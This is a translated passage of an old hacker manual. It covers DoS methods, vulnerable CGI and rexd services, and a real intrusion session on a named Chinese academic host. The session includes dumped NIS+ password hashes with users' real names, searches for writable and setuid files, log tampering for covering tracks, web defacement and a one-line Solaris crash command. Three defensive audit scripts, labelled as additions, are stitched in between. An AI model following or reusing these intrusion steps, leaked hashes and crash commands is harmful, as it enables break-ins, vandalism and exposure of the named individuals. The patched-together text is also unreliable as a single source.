
samsa Hacker's Handbook (3)

    Author: [samsa]
    2) Remote control
    2.1) DoS attacks
    2.1.1) SYN flooding
    Send the target a large number of TCP connection requests but never complete the normal three-way handshake that TCP requires, so the target system is left waiting, its network resources are consumed, and its network services become unavailable.
    2.1.2) Ping flooding
    Send the target system a large number of ping packets, i.e. ICMP_ECHO packets, so that its network interface cannot keep up and its network resources are exhausted.
    2.1.3) UDP storming
    Like 2.1.2), but sending a large number of UDP packets.
    2.1.4) E-mail bombing
    Send a large volume of e-mail to the victim's mailbox so that no space remains for legitimate mail.
    2.1.5) Nuking
    Send a small amount of specially crafted data to a particular port on the target system, causing it to crash.
    2.1.6) Hijacking
    Impersonate one side of a particular network connection and send specific packets (FIN or RST) onto the network to terminate that connection.
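Seen from the defender's side, a SYN flood (2.1.1) shows up as many half-open connections from one source. The following is an added example, not code from the manual: it parses `netstat -an` output in the Solaris column layout (the sample excerpt, addresses and threshold are constructed for the example) and counts SYN_RCVD entries per remote address and local port.

```python
import re
from collections import Counter

# Constructed `netstat -an` excerpt: one address holding several half-open
# connections to port 80, plus ordinary established sessions for contrast.
SAMPLE_NETSTAT = """\
TCP: IPv4
   Local Address        Remote Address      Swind Send-Q Rwind Recv-Q  State
-------------------- -------------------- ----- ------ ----- ------ -------
159.226.5.188.80     203.0.113.7.40001        0      0  8760      0 SYN_RCVD
159.226.5.188.80     203.0.113.7.40002        0      0  8760      0 SYN_RCVD
159.226.5.188.80     203.0.113.7.40003        0      0  8760      0 SYN_RCVD
159.226.5.188.80     203.0.113.7.40004        0      0  8760      0 SYN_RCVD
159.226.5.188.23     198.51.100.9.1520     8760      0  8760      0 ESTABLISHED
159.226.5.188.80     198.51.100.9.1521     8760      0  8760      0 ESTABLISHED
"""

# local, remote, four numeric queue/window columns, state
LINE_RE = re.compile(r"^\s*(\S+)\s+(\S+)\s+\d+\s+\d+\s+\d+\s+\d+\s+(\S+)\s*$")
HALF_OPEN = {"SYN_RCVD", "SYN_RECV"}   # Solaris and Linux spellings

def split_addr(addr):
    """'a.b.c.d.port' (Solaris) or 'a.b.c.d:port' (Linux) -> (ip, port)."""
    sep = ":" if ":" in addr else "."
    ip, port = addr.rsplit(sep, 1)
    return ip, port

def half_open_by_source(text):
    """Count half-open connections keyed by (remote ip, local port)."""
    counts = Counter()
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group(3) not in HALF_OPEN:
            continue          # headers, separators and non-SYN states
        local, remote, _state = m.groups()
        counts[(split_addr(remote)[0], split_addr(local)[1])] += 1
    return counts

def flood_suspects(text, threshold=3):
    """Sources with at least `threshold` half-open connections to one port."""
    return [(ip, port, n) for (ip, port), n in half_open_by_source(text).items()
            if n >= threshold]

if __name__ == "__main__":
    for ip, port, n in flood_suspects(SAMPLE_NETSTAT):
        print(f"{n} half-open connections from {ip} to local port {port}")
```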
    2.2) WWW (remote execution)
    2.2.1) phf CGI
    2.2.3) campus CGI
    2.2.4) glimpse CGI
    (samsa: I saw on the net that NT also has a buggy CGI called websn.exe; I don't know the details.)
    2.3) e-mail
    Same as 1.7: exploit the vulnerability in majordomo (ver. 1.94.3).
    2.4) sunrpc: rexd
    It is said that if rexd is open and rpcbind is not running in secure mode, it amounts to having no password at all, and you can remotely run arbitrary
    2.5) X Windows
    If xhost access control is disabled, the machine's display system can be controlled remotely: anything can be drawn on it, keyboard input and screen contents can be captured, and even remote execution is possible...

    IV. Breaking and entering
    Once you have a (normal user) shell on the target machine, there is a lot you can do.
    1) /etc/passwd, /etc/shadow
    Read it if you can, take it if you can, crack it if you can.
    1.1) Directly (no NIS)
    $ cat /etc/passwd
    ......
    1.2) NIS (yp: yellow pages)
    $ domainname
    cas.ac.cn
    $ ypwhich -d cas.ac.cn
    $ ypcat passwd
    1.3) NIS+
    ox% domainname
    ios.ac.cn
    ox% nisls
    ios.ac.cn:
    org_dir
    groups_dir
    ox% nisls org_dir
    org_dir.ios.ac.cn.:
    passwd
    group
    auto_master
    auto_home
    bootparams
    cred
    ethers
    hosts
    mail_aliases
    sendmailvars
    netmasks
    netgroup
    networks
    protocols
    rpc
    services
    timezone
    ox% niscat passwd.org_dir
    root:uop5Jji7N1T56:0:1:Super-User:/:/bin/csh:9841::::::
    daemon:NP:1:1::/::6445::::::
    bin:NP:2:2::/usr/bin::6445::::::
    sys:NP:3:3::/::6445::::::
    adm:NP:4:4:Admin:/var/adm::6445::::::
    lp:NP:71:8:Line Printer Admin:/usr/spool/lp::6445::::::
    smtp:NP:0:0:Mail Daemon User:/::6445::::::
    uucp:NP:5:5:uucp Admin:/usr/lib/uucp::6445::::::
    listen:*LK*:37:4:Network Admin:/usr/net/nls::::::::
    nobody:NP:60001:60001:Nobody:/::6445::::::
    noaccess:NP:60002:60002:No Access User:/::6445::::::
    guest:NP:14:300:Guest:/hd2/guest:/bin/csh:10658::::::
    syscd:qkPu7IcquHRRY:120:10::/usr/syscd:/bin/csh:::::::
    peif:DyAkTGOg/2TCY:819:800:Pei Fei:/home/peif:/bin/csh:10491::::::
    lxh:T4FjqDv0LG7uM:510:500:Liu Xuehui:/home/lxh:/bin/csh:10683::::::
    fjh:5yPB5xLOibHD6:507:500:Feng Jinhui:/home/fjh:/bin/csh:10540::::::
    lhj:UGAVVMvjp/9UM:509:500:Li Hongju:/home/lhj:/bin/csh:10142::::::
    ....
    (samsa: gotcha!!!)
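From the defender's side, the niscat/ypcat listing above is exactly what a sysadmin should audit before anyone else reads it. The following is an added example, not code from the manual: it parses passwd-format lines (classic 7-field or the Solaris layout above with aging fields after the shell) and reports entries that leave a hash in a readable map, have an empty password field, or carry uid 0 under another name. The sample lines and the hash strings are constructed placeholders, not taken from the listing.

```python
from dataclasses import dataclass

# Constructed sample in the Solaris NIS+ passwd.org_dir layout shown above;
# the hash strings are placeholders, not real hashes.
SAMPLE_PASSWD = """\
root:AbCdEfGhIjKlM:0:1:Super-User:/:/bin/csh:9841::::::
daemon:NP:1:1::/::6445::::::
smtp:NP:0:0:Mail Daemon User:/::6445::::::
listen:*LK*:37:4:Network Admin:/usr/net/nls::::::::
guest::14:300:Guest:/hd2/guest:/bin/csh:10658::::::
alice:xYzXyZxYzXyZa:819:800:Alice Example:/home/alice:/bin/csh:10491::::::
bob:x:510:500:Bob Example:/home/bob:/bin/sh
"""

# Markers that mean "no usable password" rather than a hash
LOCKED = {"NP", "*NP*", "*LK*", "*", "!", "!!"}
EXPOSED = "password hash exposed in readable map"
EMPTY = "empty password field"
EXTRA_ROOT = "extra uid 0 account"

@dataclass
class Account:
    name: str
    pw: str
    uid: int
    gid: int
    shell: str

def parse_passwd(text):
    """Parse classic 7-field or Solaris extended passwd lines."""
    accounts = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 7:          # blank or truncated line such as "...."
            continue
        accounts.append(Account(fields[0], fields[1], int(fields[2]),
                                int(fields[3]), fields[6]))
    return accounts

def audit(accounts):
    """Return (account, problem) pairs a sysadmin should act on."""
    findings = []
    for a in accounts:
        if a.pw == "":
            findings.append((a.name, EMPTY))
        elif a.pw not in LOCKED and a.pw != "x":
            findings.append((a.name, EXPOSED))   # "x" means kept in shadow
        if a.uid == 0 and a.name != "root":
            findings.append((a.name, EXTRA_ROOT))
    return findings

if __name__ == "__main__":
    for name, problem in audit(parse_passwd(SAMPLE_PASSWD)):
        print(f"{name}: {problem}")
```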
    ox% uname -a
    SunOS ox 5.5 Generic sun4d sparc SUNW,SPARCserver-1000
    ox% id
    uid=820(ywc) gid=800(ofc)
    ox% hostname
    ox
    ox% domainname
    ios.ac.cn
    ox% ifconfig -a
    lo0: flags=849 mtu 8232
    inet 127.0.0.1 netmask ff000000
    be0: flags=863 mtu 1500
    inet 159.226.5.188 netmask ffffffc0 broadcast 159.226.5.191
    ipd0: flags=c0 mtu 8232
    inet 0.0.0.0 netmask 0
    ox% netstat -rn
    Routing Table:
    Destination Gateway Flags Ref Use Interface
    -------------------- -------------------- ----- ----- ------ ---------
    127.0.0.1 127.0.0.1 UH 0 738 lo0
    159.226.5.128 159.226.5.188 U 3 341 be0
    224.0.0.0 159.226.5.188 U 3 0 be0
    default 159.226.5.189 UG 0 1198
    ......
    2.1) Looking for writable files and directories
    ox% cd /tmp
    ox% mkdir .hide
    ox% cd .hide
    ox% ls -ld `find / \( \( -type d -o -type f \) -a \( -perm -0002 -o -group 800 -a -perm -0020 \) \) -print` >.wr
    (samsa: wr = writables: writable directories and files)
    ox% grep ^d .wr > .wd
    (samsa: wd = writable directories)
    ox% grep ^- .wr > .wf
    (samsa: wf = writable files: regular files)
    ox% ls -l `find / \( -perm -4000 -a -user root \) -print` >.sr
    (samsa: sr = suid roots)
    2.1.1) System configuration files writable: e.g. pam.conf, inetd.conf, inittab, passwd, etc.
    2.1.2) bin directories writable: e.g. /usr/bin, /usr/local/bin, etc. (see: Trojan horses)
    2.1.3) Log files writable: e.g. /var/adm/wtmp, /var/adm/messages, etc. (for track erasing)
    2.2) Defacing the home page
    On the vast majority of systems the permissions under the http root directory are set wrong! If you don't believe it, look:
    ox1% grep http /etc/inetd.conf
    ox1% ps -ef | grep http
    http 7538 251 0 14:02:35 ? 0:02 /opt/home1/ofc/http/httpd/httpd -f /opt/home1/ofc/http/httpd/conf/httpd.conf
    http 7567 251 0 15:16:46 ? 0:01 /opt/home1/ofc/http/httpd/httpd -f /opt/home1/ofc/http/httpd/conf/httpd.conf
    root 251 1 0 May 05 ? 3:27 /opt/home1/ofc/http/httpd/httpd -f /opt/home1/ofc/http/httpd/conf/httpd.conf
    ......
    ox1% cd /opt/home1/ofc/http/httpd
    ox1% ls -l |more
    total 530
    drwxrwxrwx 11 http ofc 512 Jan 18 13:21 English
    -rw-rw-rw- 1 http ofc 8217 May 10 09:42 Welcome.html
    drwxr-sr-x 2 http ofc 512 Dec 24 15:20 cgi-bin
    drwxr-sr-x 2 http ofc 512 Mar 24 1997 cgi-src
    drwxrwxrwx 2 http ofc 512 Jan 12 15:05 committee
    drwxr-sr-x 2 root ofc 512 Jul 2 1998 conf
    -rwxr-xr-x 1 http ofc 203388 Jul 2 1998 httpd
    drwxrwxrwx 2 http ofc 512 Jan 12 15:06 icons
    drwxrwxrwx 2 http ofc 3072 Jan 12 15:07 images
    -rw-rw-rw- 1 http ofc 7532 Jan 12 15:08 index.htm
    drwxrwxrwx 2 http ofc 512 Jan 12 15:07 introduction
    drwxr-sr-x 2 http ofc 512 Apr 13 08:46 logs
    drwxrwxrwx 2 http ofc 1024 Jan 12 17:19 research
    (samsa: haha!! almost all of it is writable, incredible; change it, what are you waiting for??)
    3) Denial of service (DoS)
    Use system holes to cause trouble
    e.g. under Solaris 2.5 (2.5.1):
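The audit that catches the situation in 2.1 and 2.2 from the administrator's side, as an added example that is not code from the manual: it parses `ls -l` output in the layout of the httpd directory listing above and flags entries that are world-writable, writable by the shared group the `find` in 2.1 looked for (`-group 800`, assumed here to be named `ofc`), or setuid root. The listing is constructed for the example.

```python
import re

# Constructed `ls -l` listing modelled on the httpd directory shown above.
SAMPLE_LS = """\
total 530
drwxrwxrwx 11 http ofc    512 Jan 18 13:21 English
-rw-rw-rw-  1 http ofc   8217 May 10 09:42 Welcome.html
drwxr-sr-x  2 http ofc    512 Dec 24 15:20 cgi-bin
drwxr-sr-x  2 root ofc    512 Jul  2  1998 conf
-rwxr-xr-x  1 http ofc 203388 Jul  2  1998 httpd
-rw-rw-rw-  1 http ofc   7532 Jan 12 15:08 index.htm
-rwsr-xr-x  1 root sys   12345 Jul  2  1998 suidtool
"""

# type, nine permission chars, link count, owner, group, size, three date
# tokens, then the name (which may contain spaces)
LS_RE = re.compile(
    r"^([-dl])([rwxsStT-]{9})\s+\d+\s+(\S+)\s+(\S+)\s+\d+\s+\S+\s+\S+\s+\S+\s+(.+)$"
)

def audit_listing(text, shared_group="ofc"):
    """Return (name, issue) pairs for entries others can alter or abuse."""
    findings = []
    for line in text.splitlines():
        m = LS_RE.match(line)
        if not m:                 # skips "total 530" and unparsable lines
            continue
        _ftype, perm, owner, group, name = m.groups()
        # perm indexes: 0-2 owner rwx, 3-5 group rwx, 6-8 other rwx
        if perm[7] == "w":
            findings.append((name, "world-writable"))
        elif perm[4] == "w" and group == shared_group:
            findings.append((name, f"writable by group {group}"))
        if perm[2] in "sS" and owner == "root":
            findings.append((name, "setuid root"))
    return findings

if __name__ == "__main__":
    for name, issue in audit_listing(SAMPLE_LS):
        print(f"{name}: {issue}")
```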
    $ ping -sv -i 127.0.0.1 224.0.0.1
    PING 224.0.0.1 56 data bytes
    (samsa: and so the machine reboots, heh heh)

    Published by: netbull   Source: sinbad network security